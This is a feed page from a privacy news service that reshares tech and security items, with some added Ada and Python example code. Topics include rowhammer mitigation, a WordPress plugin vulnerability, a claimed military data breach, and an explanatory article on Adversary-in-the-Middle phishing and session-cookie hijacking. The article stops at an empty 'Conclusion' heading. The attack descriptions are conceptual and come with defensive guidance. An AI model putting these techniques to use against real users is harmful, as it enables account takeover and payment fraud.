

🍀 ThePrivacyPost is a service account managed directly by the Poliverso administrators. It publishes news from various sites, blogs and fediverse accounts, plus some original content.
🩸 If you find this service useful, please consider making a donation to Poliverso. You can choose between two channels:

1) Ko-Fi
2) LiberaPay 💳

Support Poliverso with Ko-Fi

Support Poliverso with LiberaPay



The Privacy Post reshared this.


European AI Roundtable [Advocacy Lab Content]
https://poliverso.org/display/0477a01e-15b3f622-7d252df76516930d
In 27 March 2024, the Computer & Communications Industry Association (CCIA Europe) hosted the inaugural edition of the European AI Roundtable in Brussels.


https://www.euractiv.com/section/artificial-intelligence/video/european-ai-roundtable/




The Privacy Post reshared this.


No Active Components in This Mysterious Audio Oscillator
https://poliverso.org/display/0477a01e-a597f6b3-7cbbe2ae39e0c93a
What’s the simplest audio frequency oscillator you can imagine? There’s the 555, of course, and we can think of a few designs using just two transistors or even a few with just one. But how about an oscillator with no active components? Now there’s a neat trick.

Replicating [Stelian]’s “simplest audio oscillator on the Internet” might take some doing on your part, since it relies on finding an old telephone. Like, really old — you’ll need one with the carbon granule cartridge in the handset, along with the speaker. Other than that, all you’ll need is a couple of 1.5-volt batteries, wiring everything in one big series loop, and placing the microphone and speaker right on top of each other. Apply power and you’re off to the races. [Stelian]’s specific setup yielded a 2.4-kHz tone that could be altered a bit by repositioning the speaker relative to the mic. On the oscilloscope, the waveform is a pretty heavily distorted sine wave.

It’s a bit of a mystery to [Stelian] as to how this works without something to provide at least a little gain. Perhaps the enclosure of the speaker or the mic has a paraboloid shape that amplifies the sound just enough to kick things off? Bah, who knows? Let the hand-waving begin!

https://www.youtube.com/embed/MssPu3M-WEQ?feature=oembed




The Privacy Post reshared this.


New JEDEC DDR5 Memory Specification: Up To 8800 MT/s, Anti-Rowhammer Features
https://poliverso.org/display/0477a01e-8bc82a6c-b2223a3ecfb9cab0

[Image: Rapid row activations (yellow rows) may change the values of bits stored in victim row (purple row). “Row hammer” (http://commons.wikimedia.org/wiki/File:Row_hammer.svg) by Dsimic, own work, licensed under CC BY-SA 4.0 (http://creativecommons.org/licenses/by-sa/4.0) via Wikimedia Commons. https://hackaday.com/wp-content/uploads/2015/03/rowhammer.png]

As DDR SDRAM increases in density and speed, so too do new challenges and opportunities appear. In the recent DDR5 update by JEDEC – as reported by Anandtech – we see not only a big speed increase from the previous maximum of 6800 Mbps to 8800 Mbps, but also the deprecation of Partial Array Self Refresh (PASR) due to security concerns, and the introduction of Per-Row Activation Counting (PRAC), which should help with row hammer-related (security) implications.

Increasing transfer speeds is primarily a matter of timings within the limits set by the overall design of DDR5, while the changes to features like PASR and PRAC are more fundamental. PASR is mostly a power-saving feature, but can apparently be abused for nefarious means, which is why it’s now gone. As for PRAC, this directly addresses the issue of row hammer attacks. Back in the 2014-era of DDR3, row hammer was mostly regarded as a way to corrupt data in RAM, but later it was found to be also a way to compromise security and effect exploits like privilege escalation.

The way PRAC seeks to prevent this is by keeping track of how often a row is being accessed, with a certain limit after which neighboring memory cells get a chance to recover from the bleed-over that is at the core of row hammer attacks. All of which means that theoretically new DDR5 RAM and memory controllers should be even faster and more secure, which is good news all around.
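To make the counting idea concrete, here is a toy model of per-row activation counting written for this page in Ada (the language used further down in this feed); it is an added illustration, not code from Hackaday, JEDEC or any DRAM vendor, and its row count, threshold and access pattern are constructed values. Every activation increments the target row's counter; when the counter reaches the threshold, the two physically adjacent rows get a refresh and the counter resets, which is the "chance to recover" described above. Real PRAC thresholds and the refresh-management handshake with the memory controller are far more involved than this.

```ada
--  Added illustration (not part of the article or the JEDEC spec): a toy
--  model of Per-Row Activation Counting (PRAC). Row count, threshold and
--  the access pattern below are made-up values.
with Ada.Text_IO;

procedure Prac_Demo is
   Rows      : constant := 8;
   Threshold : constant := 4;   --  assumption; real limits are far higher

   type Row_Index is range 0 .. Rows - 1;
   type Counter_Array is array (Row_Index) of Natural;

   Activations : Counter_Array := (others => 0);  --  activations since last reset
   Refreshes   : Counter_Array := (others => 0);  --  mitigating refreshes received

   --  Refresh the rows physically adjacent to Row (bounded at the edges).
   procedure Refresh_Neighbours (Row : Row_Index) is
   begin
      if Row > Row_Index'First then
         Refreshes (Row - 1) := Refreshes (Row - 1) + 1;
      end if;
      if Row < Row_Index'Last then
         Refreshes (Row + 1) := Refreshes (Row + 1) + 1;
      end if;
   end Refresh_Neighbours;

   --  One row activation: count it, and mitigate when the limit is reached.
   procedure Activate (Row : Row_Index) is
   begin
      Activations (Row) := Activations (Row) + 1;
      if Activations (Row) >= Threshold then
         Refresh_Neighbours (Row);
         Activations (Row) := 0;
      end if;
   end Activate;

begin
   --  Constructed access pattern: row 3 is hammered, row 5 is touched once.
   for I in 1 .. 10 loop
      Activate (3);
   end loop;
   Activate (5);

   for R in Row_Index loop
      Ada.Text_IO.Put_Line
        ("row" & Row_Index'Image (R)
         & " pending activations" & Natural'Image (Activations (R))
         & " neighbour refreshes" & Natural'Image (Refreshes (R)));
   end loop;
end Prac_Demo;
```

Save it as prac_demo.adb and build with gnatmake prac_demo.adb. With the pattern above, rows 2 and 4 each receive two neighbour refreshes (the counter on row 3 hits the threshold after the 4th and 8th activation), while row 5 never triggers one. The point is that the mitigation is keyed on the aggressor row's count, not on the victims, so the victims are refreshed before the charge leakage the text describes can accumulate.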




The Privacy Post reshared this.


FLOSS Weekly Episode 780: Zoneminder — Better Call Randal
https://poliverso.org/display/0477a01e-63b5af8e-8d4ba940e3c87ca5

Links: Isaac Connor https://www.connortechnology.com/ ; Zoneminder https://zoneminder.com/feed/

This week Jonathan Bennett and Aaron Newcomb chat with Isaac Connor about Zoneminder! That’s the project that’s working to store and deliver all the bits from security cameras — but the CCTV world has changed a lot since Zoneminder first started, over 20 years ago. The project is working hard to keep up, with machine learning object detection, WebRTC, and more. Isaac talks a bit about developer burnout, and a case or two over the years where an aggressive contributor seems suspicious in retrospect. And when is the next stable version of Zoneminder coming out, anyway?


Did you know you can watch the live recording of the show right in the Hackaday Discord? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Next week we’re taping the show on Tuesday, and looking for a guest!

https://play.libsyn.com/embed/episode/id/30958173/height/192/theme/modern/size/large/thumbnail/yes/custom-color/fcab1c/time-start/00:00:00/hide-playlist/yes/download/yes/font-color/271b04

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:




The Privacy Post reshared this.


80s Function Generator is Both Beauty and Beast
https://poliverso.org/display/0477a01e-34518344-b7e24d64d9a29b4b
You know how the saying goes — they don’t make them like this anymore. It’s arguably true of pretty much any electronic device given the way technology changes over time, though whether or not it’s objectively a bad thing is going to vary from case to case.

As a practical example, take a look at the insides of this 80’s vintage HP 3314A function generator shared on the EEV Blog Forum by [D Straney].
[Image: Hinged PCBs allow for easy access]
With multiple PCBs stacked on top of each other, it’s hard to imagine that more components could possibly be crammed into it. One board in particular appears to be an entire Motorola 6800 computer, something which today would likely be replaced with a single microcontroller.

Which is actually why [D Straney] shared this with us in the first place. After seeing our recent post about a modern waveform generator that’s basically an empty box thanks to its modern components, they thought this would be a nice example of the opposite extreme.

So, is it a good or a bad thing that test equipment isn’t made this way anymore? Well, it’s hard to argue with the improved capabilities, smaller footprint, and reduced cost of most modern gear. But damn is the inside of this HP 3314A gorgeous. As one of the commenters on the page put it, hardware from this era was really a work of art.




The Privacy Post reshared this.


Amazon Ends California Drone Deliveries While Expanding to Arizona
https://poliverso.org/display/0477a01e-d130c9fc-6cda69690fde27a9

[Image: The outgoing MK27 drone used by Amazon today for deliveries. (Credit: Amazon) https://hackaday.com/wp-content/uploads/2024/04/amazon_mk27_drone.jpg]
When Amazon started its Prime Air drone delivery service in 2022, it had picked College Station (Texas) and Lockeford (California) as the first areas where the service would be offered. Two years later, Amazon has now announced that it will be expanding to the West Valley of the Phoenix Metro area in Arizona from a new Tolleson center, while casually mentioning, buried in the press release, that the Lockeford area will no longer be serviced. No reason for this closure was provided, but as a quite experimental service, drastic shifts can be expected as Amazon figures out what does and does not work.

Amazon Prime Air features custom drones that can transport packages up to 5 lbs (~2.27 kg) to its destination within an hour, if the item is listed as Prime Air capable for your area. Along with the change in service areas, Amazon is also testing its new MK30 drone (pictured, top), which should be much quieter due to a new propeller design and have twice the range of the old MK27 as well.

Even if flying drone delivery isn’t quite a blow-away success yet, Amazon doesn’t seem to be letting up on investing in it, and it could be argued that for certain items like medication or perishables, it does make a certain sense over traditional delivery and pick-up methods.




The Privacy Post reshared this.


250,000 WordPress sites at risk of compromise. Update the Forminator plugin
https://poliverso.org/display/0477a01e-554b0ec0-fb431971bee968cc

JPCERT experts warn (https://jvn.jp/en/jp/JVN50132400/) of a series of critical vulnerabilities in the Forminator plugin for WordPress, developed by WPMU DEV. The plugin is used on more than 500,000 sites and lets users build various forms without much programming knowledge.

Of particular concern is the vulnerability identified as CVE-2024-28890 (CVSS score: 9.8), which allows attackers to remotely upload malicious code to sites using this plugin. This can lead to the leakage of confidential information, modification of site content and even complete denial of service.

JPCERT also reports other security issues, including an SQL injection vulnerability (CVE-2024-31077, score 7.2) and a cross-site scripting vulnerability (CVE-2024-31857, score 6.1). All of these flaws allow remote attackers to obtain and modify user information, as well as cause site failures.

Attacks exploiting CVE-2024-28890 have already been recorded. Moreover, WordPress.org statistics show that there are now more than 500,000 active installations of the plugin, but only 55.9% of them are currently updated to version 1.29, which fixes the identified vulnerabilities. That is, roughly 220,000 sites remain vulnerable to attack.

The developers advise site administrators to update the plugin to the latest version as soon as possible to protect their assets from possible cyberattacks.

Interestingly, at the end of August last year the Forminator plugin was affected by CVE-2023-4596, which allowed unauthenticated attackers to upload malicious files to vulnerable sites. Now, 8 months later, the situation has repeated itself.

The article 250,000 WordPress sites at risk of compromise. Update the Forminator plugin originally appeared on il blog della sicurezza informatica.




The Privacy Post reshared this.


An Elbow Joint That Can
https://poliverso.org/display/0477a01e-f873a711-4e3d06864c859b30

Project page: https://hackaday.io/project/195714-kids-prosthetic-elbow-3d-printed

We’re not certain whether [Paul Gould]’s kid’s prosthetic elbow joint is intended for use by a real kid or is part of a robotics project — but it caught our eye for the way it packs the guts of a beefy-looking motorized joint into such a small space.

At its heart is a cycloidal gearbox, in which the three small shafts which drive the center gear are driven by a toothed belt. The motive power comes from a brushless motor, which is what gives the build that impressive small size. He’s posted a YouTube short showing its internals and it doing a small amount of weight lifting, so it evidently has some pulling power.

If you’re interested in working with this design, it can be downloaded for 3D printing from Thingiverse. We think it could find an application in plenty of other projects, and we’d be interested to see what people do with it. There’s certainly a comparison to be made with robotic joints which use wires for actuation.

https://www.youtube.com/embed/uMnrzvIZLBU?feature=oembed




The Privacy Post reshared this.


EU Parliament ratifies Right to Repair Directive
https://poliverso.org/display/0477a01e-7df6a7b3-21f9582287dae1d7
Members of the European Parliament (MEPs) voted in favour of the Right to Repair Directive on Tuesday (23 April), aimed at improving consumer access to repair services in order to reduce waste.


https://www.euractiv.com/section/digital/news/eu-parliament-ratifies-right-to-repair-directive/




The Privacy Post reshared this.


Programming Ada: First Steps on the Desktop
https://poliverso.org/display/0477a01e-b46822bd-91350e8107d0b917

[Image: https://hackaday.com/wp-content/uploads/2024/04/Ada_Mascot_with_slogan.jpg]

Who doesn’t want to use a programming language that is designed to be reliable, straightforward to learn and also happens to be certified for everything from avionics to rockets and ICBMs? Despite Ada’s strong roots and impressive legacy, it has the reputation among the average hobbyist of being ‘complicated’ and ‘obscure’, yet this couldn’t be further from the truth, as previously explained. In fact, anyone who has some or even no programming experience can learn Ada, as the very premise of Ada is that it removes complexity and ambiguity from programming.

In this first part of a series, we will be looking at getting up and running with a basic desktop development environment on Windows and Linux, and run through some Ada code that familiarizes one with the syntax and basic principles of Ada. As for the Ada version used, we will be targeting Ada 2012, as the newer Ada 2022 standard was only just approved in 2023 and doesn’t change anything significant for our purposes.

Toolchain Things


The go-to Ada toolchain for those who aren’t into shelling out big amounts of money for proprietary, certified and very expensive Ada toolchains is GNAT, which at one point in time stood for the GNU NYU Ada Translator. This was the result of the United States Air Force awarding the New York University (NYU) a contract in 1992 for a free Ada compiler. The result of this was the GNAT toolchain, which per the stipulations in the contract would be licensed under the GNU GPL and its copyright assigned to the Free Software Foundation. The commercially supported (by AdaCore) version of GNAT is called GNAT Pro.

Obtaining a copy of GNAT is very easy if you’re on a common Linux distro, with the package gnat for Debian-based distros and gcc-ada if you’re Arch-based. For Windows you can either download the AdaCore GNAT Community Edition, or if you use MSYS2, you can use its package manager to install the mingw-w64-ucrt-x86_64-gcc-ada package for e.g. the new ucrt64 environment. My personal preference on Windows is the MSYS2 method, as this also provides a Unix-style shell and tools, making cross-platform development that much easier. This is also the environment that will be assumed throughout the article.

Hello Ada


The most important part of any application is its entry point, as this determines where the execution starts. Most languages have some kind of fixed name for this, such as main, but in Ada you are free to name the entry point whatever you want, e.g.:
with Ada.Text_IO;
procedure Greet is
begin
   -- Print "Hello, World!" to the screen
   Ada.Text_IO.Put_Line ("Hello, World!");
end Greet;
Here the entry point is the Greet procedure, because it’s the only procedure or function in the code. The difference between a procedure and a function is that only the latter returns a value, while the former returns nothing (similar to void in C and C++). Comments start with two dashes, and packages are imported using the with statement. In this case we want the Ada.Text_IO package, as it contains the standard output routines like Put_Line. Note that since Ada is case-insensitive, we can type all of those names in lower-case as well.

Also noticeable might be the avoidance of any symbols where an English word can be used, such as the use of is, begin and end rather than curly brackets. When closing a block with end, this is post-fixed with the name of the function or procedure, or the control structure that’s being closed (e.g. an if/else block or loop). This will be expanded upon later in the series. Finally, much like in C and C++ lines end with a semicolon.
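The following is an added example, not code from the Hackaday article: it takes the points just made (a freely named entry point, the difference between a function and a procedure, with-ing packages, and closing every block with end plus its name) and shows them together in one small program. The unit name Count_Primes, the helper names and the file name count_primes.adb are this example's own choices.

```ada
--  Added example (not from the article): a second entry point, here named
--  Count_Primes, showing a function that returns a value next to a
--  procedure that returns nothing, plus "end <name>" closing of blocks.
with Ada.Text_IO;
with Ada.Integer_Text_IO;

procedure Count_Primes is

   Found : Natural := 0;   --  how many primes we have seen so far

   --  A function returns a value; the result type follows "return".
   function Is_Prime (N : Positive) return Boolean is
   begin
      if N < 2 then
         return False;
      end if;
      for D in 2 .. N / 2 loop
         if N mod D = 0 then
            return False;
         end if;
      end loop;
      return True;
   end Is_Prime;

   --  A procedure returns nothing, like a void function in C.
   procedure Report (N : Positive; Prime : Boolean) is
   begin
      Ada.Integer_Text_IO.Put (N, Width => 3);
      if Prime then
         Ada.Text_IO.Put_Line (" is prime");
      else
         Ada.Text_IO.Put_Line (" is not prime");
      end if;
   end Report;

begin
   --  Every "for", "if" and "loop" is closed by a matching "end ...".
   for N in 1 .. 20 loop
      if Is_Prime (N) then
         Found := Found + 1;
      end if;
      Report (N, Is_Prime (N));
   end loop;
   --  Ada is case-insensitive: ada.text_io.put_line would compile as well.
   Ada.Text_IO.Put_Line ("Primes found:" & Natural'Image (Found));
end Count_Primes;
```

Save it as count_primes.adb and build it with gnatmake count_primes.adb; the last line printed is "Primes found: 8" (the leading space comes from 'Image, which reserves room for a sign). Note that the declarations of Found, Is_Prime and Report all live in the declarative part between is and begin, and that nothing outside Count_Primes can see them.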

For a reference of the syntax and much more, AdaCore has an online reference as well as a number of freely downloadable books, which include a comparison with Java and C++. The Ada Language Reference Manual (LRM) is also freely available.

Compile And Run


To compile the simple sample code above, we need to get it into a source file, which we’ll call greet.adb. The standard extensions with the GNAT toolchain are .adb for the implementation (body) and .ads for the specification (somewhat like a C++ header file). It’s good practice to use the same file name as the main package or entry point name (unit name) for the file name. It will work if not matched, but you will get a warning depending on the toolchain configuration.

Unlike in C and C++, Ada code isn’t just compiled and linked, but also has an intermediate binding step, because the toolchain fully determines the packages, dependencies, and other elements within the project before assembling the compiled code into a binary.

An important factor here is also that Ada does not work with a preprocessor, and specification files aren’t copied into the file which references them with a with statement, but only takes note of the dependency during compilation. A nice benefit of this is that include guards are not necessary, and headaches with linking such as link order of objects and libraries are virtually eliminated. This does however come at the cost of dealing with the binder.

Although GNAT comes with individual tools for each of these steps, the gnatmake tool allows the developer to handle all of these steps in one go. Although some prefer to use the AdaCore-developed gprbuild, we will not be using it, as it adds complexity that is rarely helpful. To use gnatmake to compile the example code, we use a Makefile which produces the following output:
mkdir -p bin
mkdir -p obj
gnatmake -o bin/hello_world greet.adb -D obj/
gcc -c -o obj\greet.o greet.adb
gnatbind -aOobj -x obj\greet.ali
gnatlink obj\greet.ali -o bin/hello_world.exe
Although we just called gnatmake, the compilation, binding and linking steps were all executed subsequently, resulting in our extremely sophisticated Hello World application.

For reference, the Makefile used with the example is the following:
GNATMAKE = gnatmake
MAKEDIR = mkdir -p
RM = rm -f

BIN_OUTPUT := hello_world
ADAFLAGS := -D obj/

SOURCES := greet.adb

all: makedir build

build:
	$(GNATMAKE) -o bin/$(BIN_OUTPUT) $(SOURCES) $(ADAFLAGS)

makedir:
	$(MAKEDIR) bin
	$(MAKEDIR) obj

clean:
	rm -rf obj/
	rm -rf bin/

.PHONY: all build makedir clean
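To see the specification/body split and the binder's role in practice, here is an added example that is not from the article: a user-defined package with a .ads specification and a .adb body, and a main unit that with-s it. The names Greeter, Say_Hello and the three file names are this example's own. gnatmake wants one compilation unit per file, so save the listing as one file and run gnatchop on it (a real GNAT tool that splits a file into its units), then build the main unit with gnatmake as in the Makefile above.

```ada
--  Added example (not from the article): a package split into a
--  specification and a body, plus a main unit that depends on it.
--  Save as units.txt, run "gnatchop units.txt" to get greeter.ads,
--  greeter.adb and say_hello.adb, then "gnatmake say_hello.adb".

--  greeter.ads: the specification, the only part other units see.
package Greeter is
   --  Returns a greeting for Name. Callers get this declaration through
   --  "with Greeter;" and the compiler records the dependency itself, so
   --  there is no header copy and no include guard.
   function Greeting (Name : String) return String;
end Greeter;

--  greeter.adb: the body, compiled on its own. gnatbind later checks that
--  say_hello was compiled against the same version of this spec before
--  gnatlink produces the executable.
package body Greeter is
   function Greeting (Name : String) return String is
   begin
      return "Hello, " & Name & "!";
   end Greeting;
end Greeter;

--  say_hello.adb: the entry point; as before, its name is free.
with Ada.Text_IO;
with Greeter;
procedure Say_Hello is
begin
   Ada.Text_IO.Put_Line (Greeter.Greeting ("Ada"));
end Say_Hello;
```

If you edit greeter.ads after building and rebuild only greeter.adb by hand, the bind step fails with a consistency error rather than silently linking mismatched objects; that check is the practical payoff of the binding step the text describes.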

Next Steps


Great, so now you have a working development environment for Ada with which you can build and run any code that you write. Naturally, the topic of code editors and IDEs is one can of flamewar that I won’t be cracking open here. As mentioned in my 2019 article, you can use AdaCore’s GNAT Programming Studio (GPS) for an integrated development environment experience, if that is your jam.

My own development environment is a loose constellation of Notepad++ on Windows, and Vim on Windows and elsewhere, with Bash and similar shells the environment for running the Ada toolchain in. If there is enough interest I’d be more than happy to take a look at other development environments as well in upcoming articles, so feel free to sound off in the comments.

For the next article I’ll be taking a more in-depth look at what it takes to write an Ada application that actually does something useful, using the preparatory steps of this article.




The Privacy Post reshared this.


Anonymous hackers attack the Israel Defense Forces: 233,000 military documents compromised
https://poliverso.org/display/0477a01e-4476e767-6ad0691dfdae1d70

Following a suspected cyberattack by a group of hackers associated with the Anonymous collective, the Israel Defense Forces (IDF) face allegations that sensitive data has been compromised.

According to the hackers, they gained access to 20 gigabytes of information, including more than 233,000 military documents in various formats, among them PDF files, Word documents and presentations.

The Ministry of Defense, on the other hand, denies the hack and stresses that its computer systems are secured at multiple levels and are unlikely to have been compromised directly. If some form of hacking did take place, it most likely involved civilian systems.

The hackers published a video showing apparently genuine fragments of IDF presentations, but the agency views it as a possible element of psychological warfare and questions the authenticity of the material.

Earlier this month, the same group allegedly carried out a cyberattack on the IT infrastructure of the Israeli Ministry of Justice, claiming that its members had managed to penetrate the department’s security systems and download more than 300 gigabytes of data. According to the hackers, the data contains 8 million files, including sensitive personal information.

The group’s motives remain unclear, but some of its members have expressed anti-Israeli sentiments, which could tie the attack to a broader geopolitical agenda.

It may also be that there was no real compromise at all. We saw a similar strategy last month with the Mogilevich group, which simply spread a series of rumours that it had supposedly breached several large companies.

According to the Jerusalem Post, the national cyber agency had previously issued a warning about a wave of post-Ramadan cyberattacks against Israeli online infrastructure, including websites, digital systems and leaks of sensitive data. Hackers may also use surveillance programs and attempt to gain illegal access to systems for espionage or sabotage.

The article Anonymous hackers attack the Israel Defense Forces: 233,000 military documents compromised originally appeared on il blog della sicurezza informatica.




The Privacy Post reshared this.


The Old Line State Does Something New on Privacy
https://fpf.org/blog/the-old-line-state-does-something-new-on-privacy/
@privacy
On April 6, the Maryland Senate concurred with House amendments to SB 541, the Maryland Online Data Privacy Act (MODPA), sending the bill to Governor Moore for signature. If enacted, MODPA could be a paradigm-shifting addition to the state privacy law landscape. While recent state comprehensive privacy laws generally have added to the existing landscape […]



The Privacy Post reshared this.


Happy #WorldBookDay! 📚

Are you one of those celebrating it? We cannot think about a better gift today than “Ada & Zangemann – A Tale of Software, Skateboards, and Raspberry Ice Cream”, an enjoyable story for readers of any age! 😍

#SoftwareFreedom #FreeSoftware

https://ada.fsfe.org



The Privacy Post reshared this.


EU Parliament overwhelmingly approves key telecoms regulation: price reductions down the road
https://poliverso.org/display/0477a01e-74c38f0f-77e9754a1a0425d7

The European Parliament approved on Tuesday (23 April) the EU’s broadband act, the Gigabit Infrastructure Act (GIA), which aims to accelerate the deployment of high-capacity networks and reduce prices for consumers.


https://www.euractiv.com/section/digital/news/eu-parliament-overwhelmingly-approves-key-telecoms-regulation-price-reductions-down-the-road/



The Privacy Post reshared this.


Emails reveal how Bolt tried to shape Estonia’s opposition to gig work directive
https://poliverso.org/display/0477a01e-8ec44703-ec8e9c4961a1eef7
In October 2023, mobility company Bolt, headquartered in Estonia, offered to draft a letter on behalf of the Estonian government to push back against the platform work directive — liaising directly with a government official who is a former Bolt employee.


https://www.euractiv.com/section/gig-economy/news/emails-reveals-how-bolt-tried-to-shape-estonias-position-on-gig-work-directive/




The Privacy Post reshared this.


Your Smart TV Does 4K, Surround Sound, Denial-of-service…
https://poliverso.org/display/0477a01e-e8a6f7a8-0a6ba6f48fb6512a
Any reader who has bought a TV in recent years will know that it’s now almost impossible to buy one that’s just a TV. Instead they are all “smart” TVs, with an on-board computer running a custom OS with a pile of streaming apps installed. It fits an age in which linear broadcast TV is looking increasingly archaic, but it brings with it a host of new challenges.

Normally you’d expect us to launch into a story of privacy invasion from a TV manufacturer at this point, but instead we’ve got [Priscilla]’s experience, in which her HiSense Android TV executed a denial of service on the computers on her network.

The root of the problem appears to be the TV running continuous network discovery attempts using random UUIDs, which when happening every few minutes for a year or more, overloads the key caches on other networked machines. The PC which brought the problem to light was a Windows machine, which leaves us sincerely hoping that our Linux boxen might be immune.

It’s fair to place this story more under the heading of bugs than of malicious intent, but even so it’s something that should never have made it to production. The linked story advises nobody to buy a HiSense TV, but to that we’d have to doubt that other manufacturers wouldn’t be similarly affected.

Header: William Hook, CC-BY-SA 2.0.

Thanks [Concretedog] for the tip.





Threats in the digital age: an analysis of ‘Man in the Middle’ and ‘Adversary in the Middle’ attacks
https://poliverso.org/display/0477a01e-118215ef-4aa2af2726c7f9f7

In an era of advanced cryptography, which makes traditional interception techniques less effective, cyberattacks are evolving and becoming ever more sophisticated and insidious. Among them, two variants that are particularly worrying for financial transactions in the commercial sector are the well-known “Man in the Middle” (MitM) attack and the “Adversary in the Middle” (AiTM), an even more advanced threat that uses phishing or malware techniques to compromise communication, often through the use of indirect proxies.

How the latest Man in the Middle attacks work


This threat begins with a targeted spear-phishing operation or with the exploitation of a software vulnerability within a corporate email system. Once access is obtained, the attacker uses advanced techniques to evade antispam and antimalware filters, inserting covert forwarding rules or creating automated rules that redirect relevant business communications to servers under the attacker’s control.

The critical phase of this scheme occurs when financial transactions are involved. The attackers, now in possession of sensitive business information, can produce forged documentation that is almost indistinguishable from the genuine article. They alter the IBAN in the payment details or on invoices, thereby diverting company funds to their own accounts.

AiTM attacks with indirect proxy: a silent but devastating threat


At the heart of this new wave of digital fraud is the cybercriminals’ ability to bypass two-factor authentication (2FA), especially methods based on SMS or OTP. Using sophisticated phishing kits available on phishing-as-a-service (PhaaS) platforms, fraudsters have perfected the art of orchestrating targeted attacks with surgical precision. These attacks, using the technique known as Adversary-in-the-Middle with indirect proxy, manage to intercept login credentials and 2FA tokens, effectively nullifying the security measures put in place to protect accounts.

The attack begins with fraudulent emails that mimic trusted senders, in this case the support service of an email provider, directing victims to malicious links. These lead to phishing pages that replicate the provider’s official login interfaces with extreme fidelity. Users, believing they are logging in to their own accounts, enter their credentials and 2FA code, unwittingly handing the fraudsters full control of their accounts.

Attackers often host the fraudulent sites on cloud services for their reliability and scalability. Strategies such as Fast Flux networks (which hide a server’s IP address behind a fast-changing network of hosts) or Domain Generation Algorithms (DGA, which automatically generate a large number of domain names) make it harder for the authorities to detect and take down these sites.

The role of session cookies


Session cookies are small text files that a website sends to the user’s browser. They are fundamental for maintaining state between pages and across subsequent visits. In a normal browsing session, cookies store useful information such as user preferences or authentication details, allowing users to browse without repeatedly having to enter their credentials.

In the context of an AiTM attack with indirect proxy, cookies take on crucial importance. After tricking a victim into entering credentials on a phishing page, the attackers not only capture the username and password but also intercept the session cookies.

This allows the attackers to maintain access to the service by posing as legitimate users, facilitating malicious actions such as data theft, unauthorized access to sensitive resources and the manipulation of transactions. Among these actions is “session hijacking”, in which the attacker uses the stolen session cookie to impersonate the victim.

Preventive measures and good practices


Given the sophistication of these attacks, it is essential to adopt equally advanced defensive measures:

  • Staff training: educate staff to recognize phishing techniques and to follow email security practices.
  • Two-level security checks: use secondary communication channels to confirm the authenticity of requests before making payments or significant changes to transaction details.
  • Regular audits and continuous monitoring: regularly review email forwarding and filtering rules to spot any anomalies.
  • Collaboration with customers and suppliers: establish shared security protocols and verification standards with business partners to build a collective security ecosystem.
  • Advanced authentication: use more robust MFA methods, such as push notifications or hardware tokens (e.g. FIDO2).
  • Traffic monitoring: continuously analyze network traffic to identify anomalous patterns that could indicate an attack in progress.
  • Keep systems continuously updated.
  • Preventive measures for cookie security:
    • Secure flag: ensure cookies are only sent over HTTPS connections.
    • HttpOnly flag: prevent access to cookies from client-side scripts to reduce the risk of XSS attacks.
    • SameSite flag: limit the sending of cookies in cross-origin requests to prevent attacks.
    • Cookie expiry policies: define appropriate expiry times for cookies, limiting how long they are valid and so narrowing the window of opportunity for attacks.
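The four cookie measures in the list above can be checked mechanically against what a server actually emits. The following auditor is an added example, not code from the original article: it parses each Set-Cookie header of a response and reports which of Secure, HttpOnly, SameSite=Lax/Strict and a bounded Max-Age is missing. The eight-hour lifetime policy and the sample headers are constructed assumptions.

```python
"""Audit Set-Cookie headers for session-cookie hardening flags (added example)."""
from __future__ import annotations

from dataclasses import dataclass, field

# Assumed policy value: a session cookie should not outlive a working day.
MAX_SESSION_LIFETIME_SECONDS = 8 * 60 * 60


@dataclass
class CookieAudit:
    """Result for one cookie: its name and the hardening gaps found."""
    name: str
    findings: list[str] = field(default_factory=list)

    @property
    def ok(self) -> bool:
        return not self.findings


def parse_set_cookie(header: str) -> tuple[str, str, dict[str, str | None]]:
    """Split 'name=value; Attr; Attr=val' into (name, value, {attr_lower: val})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: dict[str, str | None] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else None
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header: str,
                     max_lifetime: int = MAX_SESSION_LIFETIME_SECONDS) -> CookieAudit:
    """Check one Set-Cookie header against the four cookie measures."""
    name, _, attrs = parse_set_cookie(header)
    audit = CookieAudit(name)

    # Secure: without it the cookie is also sent over plain HTTP.
    if "secure" not in attrs:
        audit.findings.append("missing Secure")

    # HttpOnly: without it client-side script (XSS) can read the cookie.
    if "httponly" not in attrs:
        audit.findings.append("missing HttpOnly")

    # SameSite: only Lax or Strict keep the browser from attaching the cookie
    # to cross-site requests; None (or an absent attribute) does not.
    samesite = (attrs.get("samesite") or "").lower()
    if samesite not in ("lax", "strict"):
        audit.findings.append("SameSite not Lax/Strict")

    # Expiry policy: require an explicit lifetime, and bound Max-Age.
    max_age = attrs.get("max-age")
    if max_age is None:
        if "expires" not in attrs:
            audit.findings.append("no Max-Age/Expires: lifetime left to the browser")
        # An Expires date alone is accepted here without parsing it.
    else:
        try:
            seconds = int(max_age)
        except ValueError:
            audit.findings.append(f"unparseable Max-Age {max_age!r}")
        else:
            if seconds > max_lifetime:
                audit.findings.append(
                    f"Max-Age {seconds}s exceeds policy of {max_lifetime}s")
    return audit


def audit_response(headers: list[tuple[str, str]]) -> list[CookieAudit]:
    """Audit every Set-Cookie header in a response's header list."""
    return [audit_set_cookie(value) for name, value in headers
            if name.lower() == "set-cookie"]


# Constructed sample response headers, not captured from any real service.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    # Weak: session id with no protective attributes at all.
    ("Set-Cookie", "SESSIONID=9f2c1a; Path=/"),
    # Hardened version of the same cookie.
    ("Set-Cookie", "SESSIONID=9f2c1a; Path=/; Secure; HttpOnly; "
                   "SameSite=Strict; Max-Age=28800"),
    # Cross-site cookie with a 30-day lifetime.
    ("Set-Cookie", "remember=1; Secure; HttpOnly; SameSite=None; Max-Age=2592000"),
]


if __name__ == "__main__":
    for result in audit_response(SAMPLE_HEADERS):
        status = "OK  " if result.ok else "WEAK"
        detail = "; ".join(result.findings) or "all checks passed"
        print(f"{status} {result.name}: {detail}")
```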



Conclusion


